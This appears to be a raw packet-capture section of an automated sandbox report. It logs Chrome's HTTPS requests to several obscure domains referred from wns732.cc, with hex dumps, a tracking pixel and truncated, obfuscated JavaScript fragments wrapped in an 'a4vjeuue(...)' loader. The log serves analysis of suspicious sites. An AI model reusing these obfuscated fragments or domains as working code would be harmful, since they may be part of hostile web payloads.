                                                                                                                                                          2024-06-09 22:41:11 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          382192.168.2.55014743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC361OUTGET /cc.png?r=5294706042 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 4403064589353525308
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          383192.168.2.550141103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC424OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:12 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:12 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:12 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:12 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:12 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:12 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 35 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 5
                                                                                                                                                          2024-06-09 22:41:12 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:12 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:12 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          384192.168.2.550145103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC370OUTGET /zb-cloud/pwv/agent.code HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:12 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:12 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:12 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:12 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:12 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:12 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:12 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:12 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:12 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          385192.168.2.55015390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC556OUTGET /pc/240516-03/static/js/t4045-otherConf-js.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 316
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:38 GMT
                                                                                                                                                          ETag: "6645cb72-13c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[6],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE25[3],EU-FRA-paris-GLOBAL1-CACHE22[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467547
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 68062b442d0ecb4174542b27c1b69812
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124453
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC316INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 4a 67 46 30 41 61 41 62 77 41 73 41 6e 41 65 51 41 38 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 47 4d 75 4a 6f 41 6c 4b 51 42 45 7a 4a 43 41 41 45 53 64 70 55 34 64 52 41 62 6d 70 67 41 56 69 41 34 41 36 41 43 59 68 47 6e 4e 43 41 41 4b 6c 46 42 42 43 56 32 41 54 30 77 44 52 41 66 51 63 67 6b 41 57 52 51 37 6d 41 47 78 43 69 79 41 4e 79 67 76 5a 68 42 36 41 45 49 41 42 67 42 66 49 55 46 64 4f 32 4a 52 41 48 4d 6f 41 46 73 51 41 44 6b 6f 66 30 34 55 72 6e 51 41 4d 52 52 4b 47 42 41 41 5a 58 49 55 59 44 38 57 4e 6e 79 30 54 42 46 4b 45 48 5a 6d 53 6a 51 70 46 42 69 34 6e 51 54 52 47 43 68 4b 48 56 4d 55 48 4c 31 4b 41 46 46 61 47 47
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAJgF0AaAbwAsAnAeQA8AuAMwFc0YAXAS3UxGMuJoAlKQBEzJCAAESdpU4dRAbmpgAViA4A6ACYhGnNCAAKlFBBCV2AT0wDRAfQcgkAWRQ7mAGxCiyANygvZhB6AEIABgBfIUFdO2JRAHMoAFsQADkof04UrnQAMRRKGBAAZXIUYD8WNny0TBFKEHZmSjQpFBi4nQTRGChKHVMUHL1KAFFaGG


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          386192.168.2.550144103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC376OUTGET /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:12 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:12 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 31 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          2024-06-09 22:41:12 UTC37INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Method
                                                                                                                                                          2024-06-09 22:41:12 UTC38INData Raw: 56 61 72 79 3a 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a
                                                                                                                                                          Data Ascii: Vary: Access-Control-Request-Headers
                                                                                                                                                          2024-06-09 22:41:12 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:12 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:12 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:12 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:12 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 18


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          387192.168.2.55015690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC552OUTGET /pc/240516-03/static/js/t4045-index-js.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 5360
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:37 GMT
                                                                                                                                                          ETag: "6645cb71-14f0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE27[3],EU-FRA-paris-GLOBAL1-CACHE2[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467547
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e001d6f1726a58ba1d9cfcb1d886f0f5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124453
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC5360INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 5a 67 46 30 41 61 41 62 77 44 45 42 50 41 45 7a 41 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 45 59 71 59 74 41 45 70 53 41 49 69 5a 49 51 41 41 69 52 73 41 54 68 33 59 69 41 33 41 48 6b 77 41 4b 78 44 73 41 64 4e 52 41 4d 4f 61 45 41 41 56 5a 4b 43 43 46 6c 74 4b 6d 66 69 49 44 36 39 6b 45 67 43 79 4b 61 6b 77 41 32 49 45 57 51 42 75 55 4a 35 4d 49 48 51 41 68 41 41 4d 41 4c 36 43 41 72 71 32 78 43 4b 65 4b 41 44 6d 4b 4c 37 4d 72 4a 7a 63 77 72 49 67 62 45 79 79 61 4a 4a 73 30 62 48 55 38 53 4b 63 45 45 67 41 4d 68 77 79 36 53 7a 73 58 47 69 59 4f 58 6b 46 52 52 79 6c 61 48 46 32 41 4c 59 67 61 45 79 4e 6d 53 31 74 70 4c 6e 35 68 5a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgF0AaAbwDEBPAEzAC4AzAVzRgBcBLdTEYqYtAEpSAIiZIQAAiRsATh3YiA3AHkwAKxDsAdNRAMOaEAAVZKCCFltKmfiID69kEgCyKakwA2IEWQBuUJ5MIHQAhAAMAL6CArq2xCKeKADmKL7MrJzcwrIgbEyyaJJs0bHU8SKcEEgAMhwy6SzsXGiYOXkFRRylaHF2ALYgaEyNmS1tpLn5hZ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          388192.168.2.55015590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC562OUTGET /pc/240516-03/static/js/components/383/headerTip.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 3404
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:40 GMT
                                                                                                                                                          ETag: "6645cac0-d4c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[5],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE2[3],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467547
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c551bc4bb9c1912445c5a41da98d0058
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124453
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:11 UTC3404INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 46 67 47 59 42 64 41 47 67 47 38 30 42 68 41 52 67 41 6b 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 77 39 4a 41 42 4b 63 67 46 39 53 77 41 42 6f 42 57 41 4a 37 4d 32 6e 48 6d 6a 34 44 53 58 59 51 43 49 57 53 45 41 41 49 6b 48 41 45 35 64 4f 47 67 4e 77 42 35 4d 41 43 73 51 6e 41 48 51 41 54 45 45 79 35 6f 51 41 42 55 4d 6f 49 49 51 78 78 6c 4d 45 46 49 4e 41 48 31 51 6b 43 51 41 57 52 52 48 46 67 41 62 45 41 30 4b 41 44 63 6f 65 4a 59 51 42 67 42 43 41 41 59 52 51 54 4d 30 77 33 30 41 58 69 35 4d 44 51 41 52 52 77 41 4f 59 41 31 42 55 6a 52 79 2b 32 55 6b 4a 71 68 79 79 74 79 59 43 43 5a 47 30 6b 4e 75 6a 51 41 35 41 45 30 41 44 77 74
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgGYBdAGgG80BhARgAkAuAMwFc0YAXAS3Uw9JABKcgF9SwABoBWAJ7M2nHmj4DSXYQCIWSEAAIkHAE5dOGgNwB5MACsQnAHQATEEy5oQABUMoIIQxxlMEFINAH1QkCQAWRRHFgAbEA0KADcoeJYQBgBCAAYRQTM0w30AXi5MDQARRwAOYA1BUjRy+2UkJqhyytyYCCZG0kNujQA5AE0ADwt


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          389192.168.2.55015490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC557OUTGET /pc/240516-03/static/js/components/383/logo.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:11 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2556
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:40 GMT
                                                                                                                                                          ETag: "6645cac0-9fc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467547
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5c10309d0a06768a6e9c427ea2cb435a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124453
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
